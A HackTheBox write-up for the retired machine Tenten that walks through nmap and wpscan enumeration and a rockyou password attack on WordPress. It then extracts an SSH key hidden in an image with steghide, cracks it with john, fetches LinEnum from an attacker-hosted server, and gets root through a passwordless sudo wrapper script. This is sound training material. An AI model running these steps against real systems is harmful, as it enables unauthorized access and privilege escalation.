This walkthrough is for the HacktheBox retired machine named Tenten.

We pick Tenten from the list:

Foothold

We do a usual nmap scan:

nmap -sS -T4 -A -p- 10.10.10.10

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 20:51 EDT
Nmap scan report for 10.10.10.10
Host is up (0.26s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP P2000 G3 NAS device (94%), Android 4.1.1 (91%), Android 4.1.2 (91%), Linux 3.10 - 4.11 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Android 4.2.2 (Linux 3.4) (91%), DD-WRT v3.0 (Linux 4.4.2) (91%), Linux 4.1 (91%), Linux 4.4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   413.26 ms 10.10.14.1
2   413.43 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 584.34 seconds

While it was scanning I did try out the default port 80 on the browser: http://10.10.10.10 and can see right away we get a WordPress site:

From looking around, we just have the default theme, post, and comment on it.

But the Job Listing is a menu link. Let’s explore it but first run wpscan against it:

wpscan -e u --url http://10.10.10.10

We want to enumerate user IDs using the -e u switch and see if we can find any as well as any vulnerabilities, versions, and open files.

This however, can be done manually by adding: /wp-json/wp/v2/users/ to the end of the site.

Output:

_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.10.10/
[+] Started: Thu Sep 26 20:58:52 2019

Interesting Finding(s):

[+] http://10.10.10.10/
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://10.10.10.10/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.10/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://10.10.10.10/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
 |  - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
 |
 | [!] 35 vulnerabilities identified:
 |

 ...

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=====================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] takis
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)


[+] Finished: Thu Sep 26 20:59:05 2019
[+] Requests Done: 70
[+] Cached Requests: 7
[+] Data Sent: 14.062 KB
[+] Data Received: 24.943 MB
[+] Memory used: 111.887 MB
[+] Elapsed time: 00:00:12

We have a user: takis.

We then run a password attack scan on it:

wpscan -U takis -P /usr/share/wordlists/rockyou.txt --url http://10.10.10.10

While that runs let’s look at the Job Listings link:

Looks like we can upload a file:

We could test upload an image and see if we can find it.

I right-clicked and saved the banner image as banner.jpg to use as the CV file.

After doing some reading it looks like the Job Manager when uploading resumes creates a new private page. When we first submitted the post, we may have noticed the /apply/8/ so because the Hello World one is post 1 and this one is post 8 let’s see what the in between and after ones are.

As you can see we’re getting the drafts and unpublished posts. So it must be open somewhere.

Generally, the file upload path of WordPress is wp-content/uploads/<year>/<month>/<filename>.

So we try it (replacing the month and year to current values):

http://10.10.10.10/wp-content/uploads/2019/09/banner.jpg

And it works.

I attempted to upload with a reverse shell php file by spoofing it as a jpg or csv but was not successful.

Back to enumerating the private posts we see post 13 has an interesting message:

Given that they made one for Title: banner for the banner.jpg I uploaded, I am going to try to see if this is a photo. From the Archive page, it looks like it was made in April 2017.

http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

This might be one of those where the message is unrealistically hidden in the image.

So we download it:

wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

I couldn’t see much using stegsolve so I try steghide:

Setup files:

🔗 https://github.com/StefanoDeVuono/steghide

apt install -y libjpeg-dev libmcrypt-dev libmhash-dev
apt install -y steghide

Check against the file, I took a guess and left the passphrase blank:

steghide extract -sf HackerAccessGranted.jpg
Enter passphrase: <empty>
wrote extracted data to "id_rsa".

Looks like an ssh key:

cat id_rsa

User

We get a private key, which is still encrypted.

If we try to ssh as the user with this key it won’t work because it is still encrypted.

Let’s attempt to decrypt it with john:

/usr/share/john/ssh2john.py id_rsa > id_rsa.hash && /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

We get the password: superpassword.

We then attempt to login with it using the -i switch to identity the file path:

ssh -i id_rsa takis@10.10.10.10

Then start with getting the user flag.

cat user.txt

We get user.txt.

Privilege Escalation

As a bit of a detour I checked out the WordPress config file to see if the root user shared any of the config password file.

vi /var/www/html/wp-config.php

I didn’t really get anywhere from there.

Eventually, since we have the shell open we start a simple web server and move over our enumerate shell file.

On our local Kali machine:

python -m SimpleHTTPServer 9999

We can use rebootuser‘s LinEnum.sh:

wget -O enum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Then back on our reverse shell:

cd /tmp/ && wget http://10.10.XXX.XXX:9999/enum.sh

After it runs, it indicates that we have a sudo privileged script that can be run without a password:

[+] We can sudo without supplying a password!
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin

We check the file: cat /bin/fuckin:

#!/bin/bash
$1 $2 $3 $4

So it takes up to four arguments and uses bash. We could use it to spawn a bash shell:

sudo /bin/fuckin /bin/bash

Alright, it worked.

id
uid=0(root) gid=0(root) groups=0(root)

We then get to the root flag:

cat /root/root.txt

Success 😎 .